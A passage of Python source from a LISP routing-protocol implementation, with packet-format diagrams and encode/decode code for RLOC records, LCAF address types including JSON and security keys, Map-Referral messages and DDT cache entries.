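# first-bytes below are invented (0x45 is version 4/IHL 5, 0x60 is
# version 6).
#
def _example_ecm_version_nibble():
    import struct

    first_byte = struct.pack("B", 0x45)              # IPv4 header start
    assert (struct.unpack("B", first_byte[0:1])[0] >> 4) == 4

    first_byte = struct.pack("B", 0x60)              # IPv6 header start
    assert (struct.unpack("B", first_byte[0:1])[0] >> 4) == 6
#enddef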
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, 'kid' is a key-id indicating that the value
# fields in the JSON string are encrypted with the encryption key
# associated with that key-id.
#
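#
# Illustrative sketch, not called by the protocol code: the fixed JSON
# LCAF header layout packed by the encode_json() methods in this file.
# The JSON payload and key-id are invented; the LCAF length covers the
# JSON-length field, the JSON string, and the trailing AFI.
#
def _example_json_lcaf_header():
    import socket
    import struct

    json_string = '{"latitude" : "x"}'               # invented payload
    kid = (3 << 5) | 0x02                            # key-id 3, E-bit set
    packet = struct.pack("HBBBBHH", socket.htons(LISP_AFI_LCAF), 0, 0,
        LISP_LCAF_JSON_TYPE, kid, socket.htons(len(json_string) + 4),
        socket.htons(len(json_string)))
    packet += json_string.encode()
    packet += struct.pack("H", 0)                    # AFI 0: no address
    return(packet)
#enddef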
class lisp_rloc_record(object):
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and name in lisp_geo_list):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and name in lisp_elp_list):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and name in lisp_rle_list):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and name in lisp_json_list):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string.encode()
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = b""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = b""
if (self.elp):
elp_recs = b""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = b""
if (self.rle):
rle_recs = b""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += (rle_node.rloc_name + "\0").encode()
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = b""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = b""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = b""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += (self.rloc_name + "\0").encode()
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
try:
packet = packet[0:-2] + self.encode_lcaf()
except:
lprint("Could not encode LCAF for RLOC-record")
#endtry
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
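#
# For example, a local, reachable RLOC that is not being RLOC-probed
# encodes its flags as 0x0004 | 0x0001 = 0x0005 in the longword packed
# above; decode() below reverses the same bit tests.
#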
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get lisp_key() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral(object):
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
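#
# A minimal sketch (illustration only, not called by the code) showing
# the 12-byte Map-Referral header round-trip: type 6 in the top nibble
# of the first longword, the record count in its low byte, and the
# 64-bit nonce following.
#
def lisp_sketch_map_referral_header(record_count, nonce):
    first_long = (LISP_MAP_REFERRAL << 28) | (record_count & 0xff)
    header = struct.pack("I", socket.htonl(first_long))
    header += struct.pack("Q", nonce)
    decoded = lisp_map_referral()
    decoded.decode(header)
    return(decoded.record_count == (record_count & 0xff) and
        decoded.nonce == nonce)
#enddef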
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
